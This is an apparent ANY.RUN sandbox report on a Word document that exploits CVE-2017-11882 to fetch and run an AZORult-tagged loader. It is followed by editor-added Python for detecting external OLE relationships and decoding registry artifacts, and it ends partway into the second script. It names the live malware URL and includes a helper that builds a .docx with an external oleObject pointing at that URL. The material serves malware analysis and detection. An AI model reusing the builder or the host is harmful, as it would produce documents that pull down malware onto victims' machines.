General Info

File name

99e41bc7e38faf44b40023884d4e14168c6e259f807ab5fbe3b1ba2e1512ce4c.docx

Full analysis
https://app.any.run/tasks/f3563c39-db1c-475a-bfcc-904cf2674931
Verdict
Malicious activity
Analysis date
11/8/2018, 07:35:43
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

trojan

exploit

CVE-2017-11882

loader

rat

azorult

Indicators:

MIME:
application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info:
Microsoft Word 2007+
MD5

05bf3453cc17cf2fb0cc849fead0d3c2

SHA1

a58d0068723f3f3340c9f111460c6d9b5dad794c

SHA256

99e41bc7e38faf44b40023884d4e14168c6e259f807ab5fbe3b1ba2e1512ce4c

SSDEEP

192:htmm0ZQf4QtK57yMtWNU00mqQTnhr5OWQT1Q7dP55SzZbFTB8GoA6aukWJmf:htmdQztsyMtiU2LOWQT1Q7dDSzzdaHmf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
120 seconds
Additional time used
60 seconds
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
off

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

Downloads executable files from the Internet
  • EQNEDT32.EXE (PID: 3288)
Downloads executable files from IP
  • EQNEDT32.EXE (PID: 3288)
Suspicious connection from the Equation Editor
  • EQNEDT32.EXE (PID: 3288)
Equation Editor starts application (CVE-2017-11882)
  • EQNEDT32.EXE (PID: 3288)
Application was dropped or rewritten from another process
  • wiinilog.exe (PID: 2596)
Executable content was dropped or overwritten
  • wiinilog.exe (PID: 2596)
  • EQNEDT32.EXE (PID: 3288)
Creates files in the user directory
  • EQNEDT32.EXE (PID: 3288)
Unusual connect from Microsoft Office
  • WINWORD.EXE (PID: 3704)
Creates files in the user directory
  • WINWORD.EXE (PID: 3704)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 3704)

Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report

Static information

TRiD
.docx
|   Word Microsoft Office Open XML Format document (52.2%)
.zip
|   Open Packaging Conventions container (38.8%)
.zip
|   ZIP compressed archive (8.8%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
0x0002
ZipCompression:
Deflated
ZipModifyDate:
2018:11:07 09:06:14
ZipCRC:
0x82872409
ZipCompressedSize:
358
ZipUncompressedSize:
1422
ZipFileName:
[Content_Types].xml
XML
Template:
dotm.dotm
TotalEditTime:
1 minute
Pages:
1
Words:
1
Characters:
7
Application:
Microsoft Office Word
DocSecurity:
None
Lines:
1
Paragraphs:
1
ScaleCrop:
No
HeadingPairs
null
null
TitlesOfParts:
null
Company:
SPecialiST RePack
LinksUpToDate:
No
CharactersWithSpaces:
7
SharedDoc:
No
HyperlinksChanged:
No
AppVersion:
14
LastModifiedBy:
Microsoft
RevisionNumber:
1
CreateDate:
2017:09:24 17:26:00Z
ModifyDate:
2017:09:24 17:27:00Z
XMP
Creator:
Microsoft
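The static section shows an ordinary OOXML package (a ZIP with [Content_Types].xml, built from a "dotm.dotm" template, one word, seven characters) with nothing in it that exploits CVE-2017-11882 directly. The exploit arrives later: the network section records WINWORD.EXE fetching http://104.206.242.208/wiininilog.doc as soon as the file opens, and the IDS labels the file a "DOC loader of embedded OLE from external source". That behaviour normally comes from a relationship in the package whose TargetMode is External, which is static and can be checked without opening the document. The Python below is an example added by the editor, not part of the ANY.RUN report: it scans every .rels part of a .docx for external oleObject, attachedTemplate, frame, subDocument or image relationships. The package it builds for the demonstration is constructed test data that reuses the report's URL; it is not the analysed sample.

```python
"""Flag .docx packages that will fetch remote content when opened.

Editor-added example; not code from the ANY.RUN report. Scans every *.rels part
of an OOXML container for relationships with TargetMode="External" of a type
Word resolves automatically (OLE object, attached template, frame, subdocument,
image). Hyperlinks are external by design and are deliberately not flagged."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
DOC_REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
LOADER_TYPES = {"oleObject", "attachedTemplate", "frame", "subDocument", "image"}
REMOTE_SCHEMES = {"http", "https", "ftp", "file"}


def is_remote(target):
    """True for URL schemes Office fetches over the network and for UNC paths."""
    return urlsplit(target).scheme.lower() in REMOTE_SCHEMES or target.startswith("\\\\")


def external_relationships(docx_bytes):
    """Return [(rels_part, relationship_type, target)] for each relationship
    that points outside the package and is resolved automatically on open."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for part in pkg.namelist():
            if not part.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(pkg.read(part))
            except ET.ParseError:
                continue  # a damaged .rels part deserves a look too, but not here
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                if rel_type in LOADER_TYPES and is_remote(target):
                    findings.append((part, rel_type, target))
    return findings


def build_sample_docx(target, rel_type="oleObject"):
    """Constructed test package (not the analysed sample): a minimal .docx whose
    document part carries one external relationship of the given type."""
    rels = (
        f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{PKG_REL_NS}">'
        f'<Relationship Id="rId1" Type="{DOC_REL_BASE}styles" Target="styles.xml"/>'
        f'<Relationship Id="rId2" Type="{DOC_REL_BASE}{rel_type}" '
        f'Target="{target}" TargetMode="External"/>'
        f'</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", "<document/>")
        pkg.writestr("word/styles.xml", "<styles/>")
        pkg.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Reuses the host and document name seen in this report's HTTP requests.
    sample = build_sample_docx("http://104.206.242.208/wiininilog.doc")
    for part, rel_type, target in external_relationships(sample):
        print(f"{part}: external {rel_type} -> {target}")
```

Run it against a real .docx by passing the file's bytes to external_relationships(); an empty list means the document carries no auto-resolved external relationship, not that it is safe (embedded OLE objects and macros are separate checks).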

Processes

Total processes
34
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Process chain shown in the graph: winword.exe → eqnedt32.exe → wiinilog.exe (download and start)

Process information

PID
3704
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\99e41bc7e38faf44b40023884d4e14168c6e259f807ab5fbe3b1ba2e1512ce4c.docx"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\sxs.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\program files\common files\microsoft shared\office14\csi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\psapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\netprofm.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\npmproxy.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\credssp.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\cryptui.dll
c:\windows\system32\hlink.dll
c:\program files\microsoft office\office14\outlfltr.dll
c:\windows\system32\userenv.dll
c:\windows\system32\idndl.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\networkexplorer.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\program files\common files\microsoft shared\office14\1033\alrtintl.dll
c:\windows\system32\shdocvw.dll

PID
3288
CMD
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Path
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Design Science, Inc.
Description
Microsoft Equation Editor
Version
00110900
Modules
Image
c:\program files\common files\microsoft shared\equation\eqnedt32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\msi.dll
c:\program files\common files\microsoft shared\equation\1033\eeintl.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\apphelp.dll
c:\users\admin\appdata\roaming\wiinilog.exe

PID
2596
CMD
"C:\Users\admin\AppData\Roaming\wiinilog.exe"
Path
C:\Users\admin\AppData\Roaming\wiinilog.exe
Indicators
Parent process
EQNEDT32.EXE
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\roaming\wiinilog.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\propsys.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\version.dll
c:\windows\system32\shfolder.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll

Registry activity

Total events
748
Read events
683
Write events
65
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
/n$
2F6E2400780E0000010000000000000000000000
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3704
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1298661393
3704
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661508
3704
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661509
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
780E0000687F8F4F2D77D40100000000
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
kn$
6B6E2400780E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
6o$
366F2400780E00000600000001000000E000000002000000D00000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C00740065006D0070005C0039003900650034003100620063003700650033003800660061006600340034006200340030003000320033003800380034006400340065003100340031003600380063003600650032003500390066003800300037006100620035006600620065003300620031006200610032006500310035003100320063006500340063002E0064006F0063007800000000000000
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
1
3704
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661510
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
––
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Count
1
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://104.206.242.208/
Type
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://104.206.242.208/
Protocol
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://104.206.242.208/
Version
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://104.206.242.208/
Flags
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://104.206.242.208/
CobaltMajorVersion
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://104.206.242.208/
CobaltMinorVersion
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://104.206.242.208/
MsDavExt
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://104.206.242.208/
Expiration
702ABE34317FD401
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://104.206.242.208/
EnableBHO
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
5+$
352B2400780E00000600000001000000D200000002000000C20000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C006D006900630072006F0073006F00660074005C00770069006E0064006F00770073005C00740065006D0070006F007200610072007900200069006E007400650072006E00650074002000660069006C00650073005C0063006F006E00740065006E0074002E006D0073006F005C00330063006400360032003100610061002E0064006F006300000000000000
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{3FBD269F-BBBE-4DDC-A7F8-42C8A81C3EDF}
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
[F00000000][T01D4772D59AA3E70][O00000000]*http://104.206.242.208/
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000000][T01D4772D59ACAF70][O00000000]*http://104.206.242.208/wiininilog.doc
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000002][T01D4772D59ACAF70][O00000000]*http://104.206.242.208/wiininilog.doc
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\186E85
186E85
––
3704
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
ProductNonBootFilesIntl_1033
1298661386
3704
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
ProductNonBootFilesIntl_1033
1298661387
3704
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
ProductNonBootFilesIntl_1033
1298661388
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
EquationEditorFilesIntl_1033
1298661379
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASAPI32
EnableFileTracing
0
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASAPI32
EnableConsoleTracing
0
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASAPI32
FileTracingMask
4294901760
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASAPI32
ConsoleTracingMask
4294901760
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASAPI32
MaxFileSize
1048576
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASAPI32
FileDirectory
%windir%\tracing
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASMANCS
EnableFileTracing
0
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASMANCS
EnableConsoleTracing
0
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASMANCS
FileTracingMask
4294901760
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASMANCS
ConsoleTracingMask
4294901760
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASMANCS
MaxFileSize
1048576
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASMANCS
FileDirectory
%windir%\tracing
3288
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3288
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
––
3288
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3288
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
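Two of the values above are forensic artifacts worth knowing how to read. Word's File MRU and Place MRU items have the form [F<flags>][T<FILETIME>][O<value>]*<target>: the T field is a 64-bit Windows FILETIME in hex, so T01D4772D59ACAF70 places the open of http://104.206.242.208/wiininilog.doc at 2018-11-08 06:36:16 UTC, and the remote URL stays in the registry after the cached copy is cleaned up. The Resiliency\StartupItems values are REG_BINARY; in every entry here the first four bytes echo the value name ("/n$", "kn$", "6o$", "5+$" plus a NUL), the next four are the owning PID as a little-endian DWORD (780E0000 = 3704, WINWORD.EXE), and a UTF-16LE path follows. For "5+$" that path is Content.MSO\3CD621AA.doc, the cached copy of the remote document (same MD5 as wiininilog[1].doc in the dropped files list). The Python below is an editor-added example, not ANY.RUN output: the MRU decoding is the standard FILETIME conversion, while the StartupItems layout beyond the first eight bytes is not parsed but carved for UTF-16LE strings, since the record format is not documented on this page.

```python
"""Decode two Word registry artifacts recorded above.

Editor-added example, not ANY.RUN output. The MRU item format and the FILETIME
conversion are standard; the Resiliency\\StartupItems layout is not documented
here, so only the two leading fields observed in the values above are parsed and
the remainder is carved for UTF-16LE strings."""
import re
from datetime import datetime, timedelta, timezone

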